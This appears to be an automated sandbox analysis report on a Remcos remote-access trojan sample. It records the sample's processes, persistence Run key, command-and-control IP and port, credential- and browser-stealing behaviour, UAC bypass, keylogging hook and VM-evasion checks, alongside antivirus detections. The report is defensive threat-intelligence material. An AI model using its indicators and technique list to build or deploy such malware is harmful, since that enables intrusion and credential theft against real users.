                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: cmd.exe 5_2_00405042
                MITRE ATT&CK Matrix (one technique per tactic column; the leading digits in a cell are the signature counts shown in the original matrix)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 11 Scripting | Valid Accounts | 231 Windows Management Instrumentation | 11 Scripting | 1 LSASS Driver | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 21 Native API | 1 LSASS Driver | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 221 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Bypass User Account Control | 3 Obfuscated Files or Information | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Windows Service | 1 Access Token Manipulation | 12 Software Packing | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 221 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | 11 Registry Run Keys / Startup Folder | 1 Windows Service | 1 DLL Side-Loading | LSA Secrets | 159 System Information Discovery | SSH | 3 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 322 Process Injection | 1 Bypass User Account Control | Cached Domain Credentials | 451 Security Software Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 11 Registry Run Keys / Startup Folder | 1 Masquerading | DCSync | 251 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 322 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1583975  Sample: iGhDjzEiDU.exe  Startdate: 04/01/2025  Architecture: WINDOWS  Score: 100

Nodes and edges (node number, label, edge):
99  shed.dual-low.s-part-0017.t-0009.t-msedge.net  2->99
101 s-part-0017.t-0009.t-msedge.net  2->101
103 geoplugin.net  2->103
109 Suricata IDS alerts for network traffic  2->109
111 Found malware configuration  2->111
113 Malicious sample detected (through community Yara rule)  2->113
115 17 other signatures  2->115
12  iGhDjzEiDU.exe 4  2->12 started
16  mstee.sys  2->16 started
18  mskssrv.sys  2->18 started
87  C:\Users\user\AppData\...\iGhDjzEiDU.exe.log, ASCII  12->87 dropped
155 Contains functionality to bypass UAC (CMSTPLUA)  12->155
157 Contains functionalty to change the wallpaper  12->157
159 Contains functionality to steal Chrome passwords or cookies  12->159
161 5 other signatures  12->161
20  iGhDjzEiDU.exe 1 4  12->20 started
24  powershell.exe 23  12->24 started
26  iGhDjzEiDU.exe  12->26 started
83  C:\Users\user\AppData\Roaming\...\graias.exe, PE32  20->83 dropped
85  C:\Users\user\...\graias.exe:Zone.Identifier, ASCII  20->85 dropped
127 Detected Remcos RAT  20->127
129 Creates autostart registry keys with suspicious names  20->129
28  graias.exe 4  20->28 started
131 Loading BitLocker PowerShell Module  24->131
31  conhost.exe  24->31 started
147 Antivirus detection for dropped file  28->147
149 Multi AV Scanner detection for dropped file  28->149
151 Tries to steal Mail credentials (via file registry)  28->151
153 3 other signatures  28->153
33  graias.exe  28->33 started
38  powershell.exe 23  28->38 started
40  chrome.exe  28->40 started
95  185.234.72.215, 4444, 49733, 49737  COMBAHTONcombahtonGmbHDE  United Kingdom  33->95
97  geoplugin.net 178.237.33.50, 49735, 80  ATOM86-ASATOM86NL  Netherlands  33->97
79  C:\...\xyepttayrhgkznkxmawzcpzmosukc.vbs, data  33->79 dropped
81  C:\ProgramData\graias\logs.dat, data  33->81 dropped
117 Detected Remcos RAT  33->117
119 Writes to foreign memory regions  33->119
121 Maps a DLL or memory area into another process  33->121
123 Installs a global keyboard hook  33->123
42  dxdiag.exe  33->42 started
45  graias.exe  33->45 started
47  graias.exe  33->47 started
53  14 other processes  33->53
125 Loading BitLocker PowerShell Module  38->125
49  conhost.exe  38->49 started
51  WmiPrvSE.exe  38->51 started
133 Query firmware table information (likely to detect VMs)  42->133
135 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)  42->135
137 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)  42->137
139 Installs a global keyboard hook  42->139
141 Tries to steal Instant Messenger accounts or passwords  45->141
143 Tries to steal Mail credentials (via file / registry access)  45->143
145 Tries to harvest and steal browser information (history, passwords, etc)  47->145
55  chrome.exe  53->55 started
58  chrome.exe  53->58 started
60  chrome.exe  53->60 started
62  12 other processes  53->62
105 192.168.2.4, 138, 443, 4444  unknown  unknown  55->105
107 239.255.255.250  unknown  Reserved  55->107
64  chrome.exe  55->64 started
67  chrome.exe  58->67 started
69  chrome.exe  60->69 started
71  chrome.exe  62->71 started
73  chrome.exe  62->73 started
75  chrome.exe  62->75 started
77  8 other processes  62->77
89  s-part-0039.t-0009.t-msedge.net 13.107.246.67, 443, 49751, 49855  MICROSOFT-CORP-MSN-AS-BLOCKUS  United States  64->89
91  www.google.com 142.250.185.196, 443, 49755, 50095  GOOGLEUS  United States  64->91
93  8 other IPs or domains  64->93

Antivirus detection, submitted sample:
Source | Detection | Scanner | Label | Link
iGhDjzEiDU.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
iGhDjzEiDU.exe | 100% | Avira | HEUR/AGEN.1309540 |
iGhDjzEiDU.exe | 100% | Joe Sandbox ML | |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Graias\graias.exe | 100% | Avira | HEUR/AGEN.1309540 |
C:\Users\user\AppData\Roaming\Graias\graias.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Graias\graias.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                No Antivirus matches
                No Antivirus matches
Antivirus detection, URLs:
Source | Detection | Scanner | Label | Link
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf | 0% | Avira URL Cloud | safe |
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725 | 0% | Avira URL Cloud | safe |
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
www.google.com | 142.250.185.196 | true | false | | high
s-part-0039.t-0009.t-msedge.net | 13.107.246.67 | true | false | | high
js.monitor.azure.com | unknown | unknown | false | | high
mdec.nelreports.net | unknown | unknown | false | | high

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js | false | | high
http://geoplugin.net/json.gp | false | | high
URLs from memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf | chromecache_157.13.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | chpC919.tmp.38.dr | false | | high
http://www.fontbureau.com/designersG | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comr | graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | chpC919.tmp.38.dr | false | | high
http://www.fontbureau.com/designers/? | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/ | chromecache_157.13.dr | false | | high
https://www.linkedin.com/cws/share?url=$ | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://www.tiro.com | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | chpC919.tmp.38.dr | false | | high
http://www.fontbureau.com/designers | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net | graias.exe, 00000026.00000002.2105157332.0000000000D73000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Youssef1313 | chromecache_157.13.dr | false | | high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0 | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://aka.ms/msignite_docs_banner | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9 | chromecache_190.13.dr | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://polymer.github.io/AUTHORS.txt | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml | chromecache_157.13.dr | false | | high
http://www.sajatypeworks.com | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://management.azure.com/subscriptions?api-version=2016-06-01 | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md | chromecache_157.13.dr | false | | high
http://geoplugin.net/json.gp/C | iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://aka.ms/pshelpmechoose | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://aka.ms/feedback/report?space=61 | chromecache_157.13.dr, chromecache_191.13.dr | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | chpC919.tmp.38.dr | false | | high
http://www.galapagosdesign.com/DPlease | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://learn-video.azurefd.net/vod/player | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://login.yahoo.com/config/login | graias.exe | false | | high
http://www.fonts.com | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://twitter.com/intent/tweet?original_referer=$ | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://github.com/gewarren | chromecache_157.13.dr | false | | high
http://www.urwpp.deDPlease | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net/ | graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://polymer.github.io/CONTRIBUTORS.txt | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003141000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000006.00000002.1717497130.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md | chromecache_157.13.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725 | chromecache_157.13.dr | false | Avira URL Cloud: safe | unknown
https://client-api.arkoselabs.com/v2/api.js | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | chpC919.tmp.38.dr | false | | high
https://github.com/Thraka | chromecache_157.13.dr | false | | high
http://polymer.github.io/PATENTS.txt | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://aka.ms/certhelp | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://www.imvu.com | graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | chpC919.tmp.38.dr | false | | high
https://github.com/mairaw | chromecache_157.13.dr | false | | high
https://schema.org | chromecache_190.13.dr | false | | high
http://polymer.github.io/LICENSE.txt | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://www.ecosia.org/newtab/ | chpC919.tmp.38.dr | false | | high
https://aka.ms/yourcaliforniaprivacychoices | chromecache_157.13.dr | false | | high
http://www.carterandcone.coml | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | chpC919.tmp.38.dr | false | | high
https://github.com/nschonni | chromecache_157.13.dr | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05 | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://www.fontbureau.com/designers/frere-user.html | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/adegeo | chromecache_157.13.dr | false | | high
http://www.jiyu-kobo.co.jp/ | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/jonschlinkert/is-plain-object | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://octokit.github.io/rest.js/#throttling | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://www.fontbureau.com/designers8 | iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/accounts/servicelogin | graias.exe | false | | high
https://github.com/js-cookie/js-cookie | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://schema.org/Organization | chromecache_157.13.dr | false | | high
https://channel9.msdn.com/ | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | chpC919.tmp.38.dr | false | | high
https://github.com/dotnet/try | chromecache_169.13.dr, chromecache_190.13.dr | false | | high
http://www.ebuddy.com | graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.246.67 | s-part-0039.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.185.196 | www.google.com | United States | 15169 | GOOGLEUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
185.234.72.215 | unknown | United Kingdom | 30823 | COMBAHTONcombahtonGmbHDE | true
IP: 192.168.2.4
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583975
Start date and time: 2025-01-04 00:01:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 62
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: iGhDjzEiDU.exe
renamed because original name is a hash value
Original Sample Name: 7caf240db905f259197cf71b03acf888.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@176/88@11/6
EGA Information:
• Successful, ratio: 87.5%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 270
• Number of non-executed functions: 216
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.56.254.14, 142.250.186.99, 142.250.185.174, 74.125.133.84, 95.101.150.2, 142.250.184.238, 142.250.185.142, 199.232.210.172, 20.189.173.18, 216.58.212.138, 142.250.185.170, 172.217.23.106, 142.250.181.234, 142.250.186.170, 142.250.185.138, 172.217.18.106, 142.250.184.202, 142.250.185.106, 142.250.186.138, 216.58.206.42, 142.250.186.74, 142.250.185.202, 142.250.185.234, 216.58.212.170, 172.217.16.138, 192.229.221.95, 2.22.242.139, 2.22.242.82, 13.74.129.1, 13.107.21.237, 204.79.197.237, 13.89.178.26, 142.250.181.238, 216.58.212.174, 172.217.16.142, 142.250.186.78, 142.250.186.131, 34.104.35.123, 142.250.185.238, 172.217.16.206, 2.16.168.102, 2.16.168.100, 20.189.173.25, 142.250.185.110, 23.56.254.164, 13.107.246.45, 20.12.23.50, 4.245.163.56
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, onedscolprdcus00.centralus.cloudapp.azure.com, onedscolprdwus15.westus.cloudapp.azure.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go
• Execution Graph export aborted for target dxdiag.exe, PID 8544 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: iGhDjzEiDU.exe
Time | Type | Description
18:01:56 | API Interceptor | 1x Sleep call for process: iGhDjzEiDU.exe modified
18:01:58 | API Interceptor | 38x Sleep call for process: powershell.exe modified
18:01:59 | API Interceptor | 9066x Sleep call for process: graias.exe modified
23:02:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"
23:02:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
239.255.255.250 | random.exe | malicious | Unknown |
239.255.255.250 | random.exe | malicious | Unknown |
239.255.255.250 | 1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exe | malicious | LiteHTTP Bot |
239.255.255.250 | https://www.copiat.ro/6.exe | malicious | Unknown |
239.255.255.250 | http://www.cipassoitalia.it/ | malicious | CAPTCHA Scam ClickFix |
239.255.255.250 | http://lzkaw.theaudiobee.com/4JvVHv3166gBJC324kvamxlnkfn259BVCQSWLGBOGFXUP772APMZ15384h17 | malicious | Unknown |
239.255.255.250 | https://rfqdocu.construction-org.com/Q5kL4/ | malicious | HTMLPhisher |
239.255.255.250 | https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d | malicious | Unknown |
13.107.246.67 | http://knoxoms.com | malicious | Unknown |
13.107.246.67 | file.exe (9 matching samples with this name) | malicious | LummaC |
178.237.33.50 | 1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | heteronymous.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 2LDJIyMl2r.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1evAkYZpwDV0N4v.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 94e.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 94e.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 0442.pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
                                                                                                                                                                                                                                          SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          s-part-0017.t-0009.t-msedge.netrandom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          Automatisation Microsoft 365.msgGet hashmaliciousunknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          Reparto Trabajo TP4.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                          s-part-0039.t-0009.t-msedge.nethttp://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 13.107.246.67
